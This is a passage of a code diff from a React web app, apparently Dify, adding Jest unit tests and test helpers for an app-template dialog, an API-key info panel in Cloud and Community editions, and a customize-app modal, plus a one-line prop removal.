render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
// Verify that useKeyPress was called with a function
const calls = useKeyPress.mock.calls
expect(calls.length).toBeGreaterThan(0)
expect(calls[0][0]).toBe('esc')
expect(typeof calls[0][1]).toBe('function')
})
})
describe('Edge Cases', () => {
it('should handle null props gracefully', () => {
expect(() => {
render(<CreateAppTemplateDialog
show={true}
onSuccess={jest.fn()}
onClose={jest.fn()}
// onCreateFromBlank is undefined
/>)
}).not.toThrow()
})
it('should handle undefined props gracefully', () => {
expect(() => {
render(<CreateAppTemplateDialog
show={true}
onSuccess={jest.fn()}
onClose={jest.fn()}
onCreateFromBlank={undefined}
/>)
}).not.toThrow()
})
it('should handle rapid show/hide toggles', () => {
// Test initial state
const { unmount } = render(<CreateAppTemplateDialog {...defaultProps} show={false} />)
unmount()
// Test show state
render(<CreateAppTemplateDialog {...defaultProps} show={true} />)
expect(screen.getByRole('dialog')).toBeInTheDocument()
// Test hide state
render(<CreateAppTemplateDialog {...defaultProps} show={false} />)
// Due to transition animations, we just verify the component handles the prop change
expect(() => render(<CreateAppTemplateDialog {...defaultProps} show={false} />)).not.toThrow()
})
it('should handle missing optional onCreateFromBlank prop', () => {
const { onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps
expect(() => {
render(<CreateAppTemplateDialog {...propsWithoutOnCreate} show={true} />)
}).not.toThrow()
expect(screen.getByTestId('app-list')).toBeInTheDocument()
expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument()
})
it('should work with all required props only', () => {
const requiredProps = {
show: true,
onSuccess: jest.fn(),
onClose: jest.fn(),
}
expect(() => {
render(<CreateAppTemplateDialog {...requiredProps} />)
}).not.toThrow()
expect(screen.getByRole('dialog')).toBeInTheDocument()
expect(screen.getByTestId('app-list')).toBeInTheDocument()
})
})
})

View File

@ -0,0 +1,209 @@
import type { RenderOptions } from '@testing-library/react'
import { fireEvent, render } from '@testing-library/react'
import { defaultPlan } from '@/app/components/billing/config'
import { noop } from 'lodash-es'
import type { ModalContextState } from '@/context/modal-context'
import APIKeyInfoPanel from './index'
// Mock the modules before importing the functions
jest.mock('@/context/provider-context', () => ({
useProviderContext: jest.fn(),
}))
jest.mock('@/context/modal-context', () => ({
useModalContext: jest.fn(),
}))
import { useProviderContext as actualUseProviderContext } from '@/context/provider-context'
import { useModalContext as actualUseModalContext } from '@/context/modal-context'
// Type casting for mocks
const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction<typeof actualUseProviderContext>
const mockUseModalContext = actualUseModalContext as jest.MockedFunction<typeof actualUseModalContext>
// Default mock data
const defaultProviderContext = {
modelProviders: [],
refreshModelProviders: noop,
textGenerationModelList: [],
supportRetrievalMethods: [],
isAPIKeySet: false,
plan: defaultPlan,
isFetchedPlan: false,
enableBilling: false,
onPlanInfoChanged: noop,
enableReplaceWebAppLogo: false,
modelLoadBalancingEnabled: false,
datasetOperatorEnabled: false,
enableEducationPlan: false,
isEducationWorkspace: false,
isEducationAccount: false,
allowRefreshEducationVerify: false,
educationAccountExpireAt: null,
isLoadingEducationAccountInfo: false,
isFetchingEducationAccountInfo: false,
webappCopyrightEnabled: false,
licenseLimit: {
workspace_members: {
size: 0,
limit: 0,
},
},
refreshLicenseLimit: noop,
isAllowTransferWorkspace: false,
isAllowPublishAsCustomKnowledgePipelineTemplate: false,
}
const defaultModalContext: ModalContextState = {
setShowAccountSettingModal: noop,
setShowApiBasedExtensionModal: noop,
setShowModerationSettingModal: noop,
setShowExternalDataToolModal: noop,
setShowPricingModal: noop,
setShowAnnotationFullModal: noop,
setShowModelModal: noop,
setShowExternalKnowledgeAPIModal: noop,
setShowModelLoadBalancingModal: noop,
setShowOpeningModal: noop,
setShowUpdatePluginModal: noop,
setShowEducationExpireNoticeModal: noop,
setShowTriggerEventsLimitModal: noop,
}
export type MockOverrides = {
providerContext?: Partial<typeof defaultProviderContext>
modalContext?: Partial<typeof defaultModalContext>
}
export type APIKeyInfoPanelRenderOptions = {
mockOverrides?: MockOverrides
} & Omit<RenderOptions, 'wrapper'>
// Setup function to configure mocks
export function setupMocks(overrides: MockOverrides = {}) {
mockUseProviderContext.mockReturnValue({
...defaultProviderContext,
...overrides.providerContext,
})
mockUseModalContext.mockReturnValue({
...defaultModalContext,
...overrides.modalContext,
})
}
// Custom render function
export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) {
const { mockOverrides, ...renderOptions } = options
setupMocks(mockOverrides)
return render(<APIKeyInfoPanel />, renderOptions)
}
// Helper functions for common test scenarios
export const scenarios = {
// Render with API key not set (default)
withAPIKeyNotSet: (overrides: MockOverrides = {}) =>
renderAPIKeyInfoPanel({
mockOverrides: {
providerContext: { isAPIKeySet: false },
...overrides,
},
}),
// Render with API key already set
withAPIKeySet: (overrides: MockOverrides = {}) =>
renderAPIKeyInfoPanel({
mockOverrides: {
providerContext: { isAPIKeySet: true },
...overrides,
},
}),
// Render with mock modal function
withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) =>
renderAPIKeyInfoPanel({
mockOverrides: {
modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal },
...overrides,
},
}),
}
// Common test assertions
export const assertions = {
// Should render main button
shouldRenderMainButton: () => {
const button = document.querySelector('button.btn-primary')
expect(button).toBeInTheDocument()
return button
},
// Should not render at all
shouldNotRender: (container: HTMLElement) => {
expect(container.firstChild).toBeNull()
},
// Should have correct panel styling
shouldHavePanelStyling: (panel: HTMLElement) => {
expect(panel).toHaveClass(
'border-components-panel-border',
'bg-components-panel-bg',
'relative',
'mb-6',
'rounded-2xl',
'border',
'p-8',
'shadow-md',
)
},
// Should have close button
shouldHaveCloseButton: (container: HTMLElement) => {
const closeButton = container.querySelector('.absolute.right-4.top-4')
expect(closeButton).toBeInTheDocument()
expect(closeButton).toHaveClass('cursor-pointer')
return closeButton
},
}
// Common user interactions
export const interactions = {
// Click the main button
clickMainButton: () => {
const button = document.querySelector('button.btn-primary')
if (button) fireEvent.click(button)
return button
},
// Click the close button
clickCloseButton: (container: HTMLElement) => {
const closeButton = container.querySelector('.absolute.right-4.top-4')
if (closeButton) fireEvent.click(closeButton)
return closeButton
},
}
// Text content keys for assertions
export const textKeys = {
selfHost: {
titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/,
titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/,
setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/,
tryCloud: /appOverview\.apiKeyInfo\.tryCloud/,
},
cloud: {
trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/,
trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/,
setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/,
},
}
// Setup and cleanup utilities
export function clearAllMocks() {
jest.clearAllMocks()
}
// Export mock functions for external access
export { mockUseProviderContext, mockUseModalContext, defaultModalContext }

View File

@ -0,0 +1,122 @@
import { cleanup, screen } from '@testing-library/react'
import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants'
import {
assertions,
clearAllMocks,
defaultModalContext,
interactions,
mockUseModalContext,
scenarios,
textKeys,
} from './apikey-info-panel.test-utils'
// Mock config for Cloud edition
jest.mock('@/config', () => ({
IS_CE_EDITION: false, // Test Cloud edition
}))
afterEach(cleanup)
describe('APIKeyInfoPanel - Cloud Edition', () => {
const mockSetShowAccountSettingModal = jest.fn()
beforeEach(() => {
clearAllMocks()
mockUseModalContext.mockReturnValue({
...defaultModalContext,
setShowAccountSettingModal: mockSetShowAccountSettingModal,
})
})
describe('Rendering', () => {
it('should render without crashing when API key is not set', () => {
scenarios.withAPIKeyNotSet()
assertions.shouldRenderMainButton()
})
it('should not render when API key is already set', () => {
const { container } = scenarios.withAPIKeySet()
assertions.shouldNotRender(container)
})
it('should not render when panel is hidden by user', () => {
const { container } = scenarios.withAPIKeyNotSet()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Cloud Edition Content', () => {
it('should display cloud version title', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument()
})
it('should display emoji for cloud version', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.querySelector('em-emoji')).toBeInTheDocument()
expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀')
})
it('should display cloud version description', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument()
})
it('should not render external link for cloud version', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument()
})
it('should display set API button text', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument()
})
})
describe('User Interactions', () => {
it('should call setShowAccountSettingModal when set API button is clicked', () => {
scenarios.withMockModal(mockSetShowAccountSettingModal)
interactions.clickMainButton()
expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({
payload: ACCOUNT_SETTING_TAB.PROVIDER,
})
})
it('should hide panel when close button is clicked', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.firstChild).toBeInTheDocument()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Props and Styling', () => {
it('should render button with primary variant', () => {
scenarios.withAPIKeyNotSet()
const button = screen.getByRole('button')
expect(button).toHaveClass('btn-primary')
})
it('should render panel container with correct classes', () => {
const { container } = scenarios.withAPIKeyNotSet()
const panel = container.firstChild as HTMLElement
assertions.shouldHavePanelStyling(panel)
})
})
describe('Accessibility', () => {
it('should have button with proper role', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByRole('button')).toBeInTheDocument()
})
it('should have clickable close button', () => {
const { container } = scenarios.withAPIKeyNotSet()
assertions.shouldHaveCloseButton(container)
})
})
})

View File

@ -0,0 +1,162 @@
import { cleanup, screen } from '@testing-library/react'
import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants'
import {
assertions,
clearAllMocks,
defaultModalContext,
interactions,
mockUseModalContext,
scenarios,
textKeys,
} from './apikey-info-panel.test-utils'
// Mock config for CE edition
jest.mock('@/config', () => ({
IS_CE_EDITION: true, // Test CE edition by default
}))
afterEach(cleanup)
describe('APIKeyInfoPanel - Community Edition', () => {
const mockSetShowAccountSettingModal = jest.fn()
beforeEach(() => {
clearAllMocks()
mockUseModalContext.mockReturnValue({
...defaultModalContext,
setShowAccountSettingModal: mockSetShowAccountSettingModal,
})
})
describe('Rendering', () => {
it('should render without crashing when API key is not set', () => {
scenarios.withAPIKeyNotSet()
assertions.shouldRenderMainButton()
})
it('should not render when API key is already set', () => {
const { container } = scenarios.withAPIKeySet()
assertions.shouldNotRender(container)
})
it('should not render when panel is hidden by user', () => {
const { container } = scenarios.withAPIKeyNotSet()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Content Display', () => {
it('should display self-host title content', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument()
expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument()
})
it('should display set API button text', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument()
})
it('should render external link with correct href for self-host version', () => {
const { container } = scenarios.withAPIKeyNotSet()
const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]')
expect(link).toBeInTheDocument()
expect(link).toHaveAttribute('target', '_blank')
expect(link).toHaveAttribute('rel', 'noopener noreferrer')
expect(link).toHaveTextContent(textKeys.selfHost.tryCloud)
})
it('should have external link with proper styling for self-host version', () => {
const { container } = scenarios.withAPIKeyNotSet()
const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]')
expect(link).toHaveClass(
'mt-2',
'flex',
'h-[26px]',
'items-center',
'space-x-1',
'p-1',
'text-xs',
'font-medium',
'text-[#155EEF]',
)
})
})
describe('User Interactions', () => {
it('should call setShowAccountSettingModal when set API button is clicked', () => {
scenarios.withMockModal(mockSetShowAccountSettingModal)
interactions.clickMainButton()
expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({
payload: ACCOUNT_SETTING_TAB.PROVIDER,
})
})
it('should hide panel when close button is clicked', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.firstChild).toBeInTheDocument()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Props and Styling', () => {
it('should render button with primary variant', () => {
scenarios.withAPIKeyNotSet()
const button = screen.getByRole('button')
expect(button).toHaveClass('btn-primary')
})
it('should render panel container with correct classes', () => {
const { container } = scenarios.withAPIKeyNotSet()
const panel = container.firstChild as HTMLElement
assertions.shouldHavePanelStyling(panel)
})
})
describe('State Management', () => {
it('should start with visible panel (isShow: true)', () => {
scenarios.withAPIKeyNotSet()
assertions.shouldRenderMainButton()
})
it('should toggle visibility when close button is clicked', () => {
const { container } = scenarios.withAPIKeyNotSet()
expect(container.firstChild).toBeInTheDocument()
interactions.clickCloseButton(container)
assertions.shouldNotRender(container)
})
})
describe('Edge Cases', () => {
it('should handle provider context loading state', () => {
scenarios.withAPIKeyNotSet({
providerContext: {
modelProviders: [],
textGenerationModelList: [],
},
})
assertions.shouldRenderMainButton()
})
})
describe('Accessibility', () => {
it('should have button with proper role', () => {
scenarios.withAPIKeyNotSet()
expect(screen.getByRole('button')).toBeInTheDocument()
})
it('should have clickable close button', () => {
const { container } = scenarios.withAPIKeyNotSet()
assertions.shouldHaveCloseButton(container)
})
})
})

View File

@ -401,7 +401,6 @@ function AppCard({
/>
<CustomizeModal
isShow={showCustomizeModal}
linkUrl=""
onClose={() => setShowCustomizeModal(false)}
appId={appInfo.id}
api_base_url={appInfo.api_base_url}

View File

@ -0,0 +1,434 @@
import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import CustomizeModal from './index'
import { AppModeEnum } from '@/types/app'
// Mock useDocLink from context
const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`)
jest.mock('@/context/i18n', () => ({
useDocLink: () => mockDocLink,
}))
// Mock window.open
const mockWindowOpen = jest.fn()
Object.defineProperty(window, 'open', {
value: mockWindowOpen,
writable: true,
})
describe('CustomizeModal', () => {
const defaultProps = {
isShow: true,
onClose: jest.fn(),
api_base_url: 'https://api.example.com',
appId: 'test-app-id-123',
mode: AppModeEnum.CHAT,
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests - verify component renders correctly with various configurations
describe('Rendering', () => {
it('should render without crashing when isShow is true', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument()
})
})
it('should not render content when isShow is false', async () => {
// Arrange
const props = { ...defaultProps, isShow: false }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument()
})
})
it('should render modal description', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument()
})
})
it('should render way 1 and way 2 tags', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument()
expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument()
})
})
it('should render all step numbers (1, 2, 3)', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
expect(screen.getByText('1')).toBeInTheDocument()
expect(screen.getByText('2')).toBeInTheDocument()
expect(screen.getByText('3')).toBeInTheDocument()
})
})
it('should render step instructions', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument()
expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument()
expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument()
})
})
it('should render environment variables with appId and api_base_url', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
expect(preElement).toBeInTheDocument()
expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'')
expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'')
})
})
it('should render GitHub icon in step 1 button', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert - find the GitHub link and verify it contains an SVG icon
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toBeInTheDocument()
expect(githubLink.querySelector('svg')).toBeInTheDocument()
})
})
})
// Props tests - verify props are correctly applied
describe('Props', () => {
it('should display correct appId in environment variables', async () => {
// Arrange
const customAppId = 'custom-app-id-456'
const props = { ...defaultProps, appId: customAppId }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`)
})
})
it('should display correct api_base_url in environment variables', async () => {
// Arrange
const customApiUrl = 'https://custom-api.example.com'
const props = { ...defaultProps, api_base_url: customApiUrl }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre')
expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`)
})
})
})
// Mode-based conditional rendering tests - verify GitHub link changes based on app mode
describe('Mode-based GitHub link', () => {
it('should link to webapp-conversation repo for CHAT mode', async () => {
// Arrange
const props = { ...defaultProps, mode: AppModeEnum.CHAT }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation')
})
})
it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => {
// Arrange
const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation')
})
})
it('should link to webapp-text-generator repo for COMPLETION mode', async () => {
// Arrange
const props = { ...defaultProps, mode: AppModeEnum.COMPLETION }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator')
})
})
it('should link to webapp-text-generator repo for WORKFLOW mode', async () => {
// Arrange
const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator')
})
})
it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => {
// Arrange
const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator')
})
})
})
// External links tests - verify external links have correct security attributes
describe('External links', () => {
it('should have GitHub repo link that opens in new tab', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
expect(githubLink).toHaveAttribute('target', '_blank')
expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer')
})
})
it('should have Vercel docs link that opens in new tab', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const vercelLink = screen.getByRole('link', { name: /step2Operation/i })
expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github')
expect(vercelLink).toHaveAttribute('target', '_blank')
expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer')
})
})
})
// User interactions tests - verify user actions trigger expected behaviors
describe('User Interactions', () => {
it('should call window.open with doc link when way 2 button is clicked', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
await waitFor(() => {
expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument()
})
const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button')
expect(way2Button).toBeInTheDocument()
fireEvent.click(way2Button!)
// Assert
expect(mockWindowOpen).toHaveBeenCalledTimes(1)
expect(mockWindowOpen).toHaveBeenCalledWith(
expect.stringContaining('/guides/application-publishing/developing-with-apis'),
'_blank',
)
})
it('should call onClose when modal close button is clicked', async () => {
// Arrange
const onClose = jest.fn()
const props = { ...defaultProps, onClose }
// Act
render(<CustomizeModal {...props} />)
// Wait for modal to be fully rendered
await waitFor(() => {
expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument()
})
// Find the close button by navigating from the heading to the close icon
// The close icon is an SVG inside a sibling div of the title
const heading = screen.getByRole('heading', { name: /customize\.title/i })
const closeIcon = heading.parentElement!.querySelector('svg')
// Assert - closeIcon must exist for the test to be valid
expect(closeIcon).toBeInTheDocument()
fireEvent.click(closeIcon!)
expect(onClose).toHaveBeenCalledTimes(1)
})
})
// Edge cases tests - verify component handles boundary conditions
describe('Edge Cases', () => {
it('should handle empty appId', async () => {
// Arrange
const props = { ...defaultProps, appId: '' }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'')
})
})
it('should handle empty api_base_url', async () => {
// Arrange
const props = { ...defaultProps, api_base_url: '' }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre')
expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'')
})
})
it('should handle special characters in appId', async () => {
// Arrange
const specialAppId = 'app-id-with-special-chars_123'
const props = { ...defaultProps, appId: specialAppId }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`)
})
})
it('should handle URL with special characters in api_base_url', async () => {
// Arrange
const specialApiUrl = 'https://api.example.com:8080/v1'
const props = { ...defaultProps, api_base_url: specialApiUrl }
// Act
render(<CustomizeModal {...props} />)
// Assert
await waitFor(() => {
const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre')
expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`)
})
})
})
// StepNum component tests - verify step number styling
describe('StepNum component', () => {
it('should render step numbers with correct styling class', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert - The StepNum component is the direct container of the text
await waitFor(() => {
const stepNumber1 = screen.getByText('1')
expect(stepNumber1).toHaveClass('rounded-2xl')
})
})
})
// GithubIcon component tests - verify GitHub icon renders correctly
describe('GithubIcon component', () => {
it('should render GitHub icon SVG within GitHub link button', async () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<CustomizeModal {...props} />)
// Assert - Find GitHub link and verify it contains an SVG icon with expected class
await waitFor(() => {
const githubLink = screen.getByRole('link', { name: /step1Operation/i })
const githubIcon = githubLink.querySelector('svg')
expect(githubIcon).toBeInTheDocument()
expect(githubIcon).toHaveClass('text-text-secondary')
})
})
})
})

Some files were not shown because too many files have changed in this diff Show More